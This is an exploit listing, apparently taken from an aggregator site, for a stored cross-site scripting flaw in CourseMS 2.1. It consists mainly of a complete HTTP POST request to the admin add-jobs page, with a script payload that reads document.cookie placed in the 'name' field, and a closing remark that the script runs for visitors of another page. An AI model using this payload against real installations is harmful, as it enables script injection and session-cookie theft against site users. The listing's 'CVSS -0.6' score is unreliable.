Exploit for CourseMS 2.1 Cross Site Scripting

Name: Exploit for CourseMS 2.1 Cross Site Scripting
Rating: 5 (402 reviews)

2021-03-31 | CVSS -0.6

## https://sploitus.com/exploit?id=PACKETSTORM:162036
# Exploit Title: CourseMS 2.1 - 'name' Stored XSS  
# Date: 03/30/2021  
# Exploit Author: cptsticky  
# Vendor Homepage: http://sourceforge.net/projects/coursems  
# Software Link: https://sourceforge.net/projects/coursems/files/latest/download  
# Version: 2.1  
# Tested on: Ubuntu 20.04  
  
POST /coursems/admin/add_jobs.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 91  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/coursems/admin/add_jobs.php  
Cookie: PHPSESSID=9c5cgusplbmb09g86sfapoiie4; __utma=2772400.1964691305.1617119061.1617119061.1617119061.1; __utmb=2772400.87.10.1617119061; __utmc=2772400; __utmz=2772400.1617119061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)  
Upgrade-Insecure-Requests: 1  
  
name=dirkgently%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&add_jobs=Add+Job+Title  
  
  
Anyone who visits the http://localhost/coursems/add_user.php will prompt execution of the stored XSS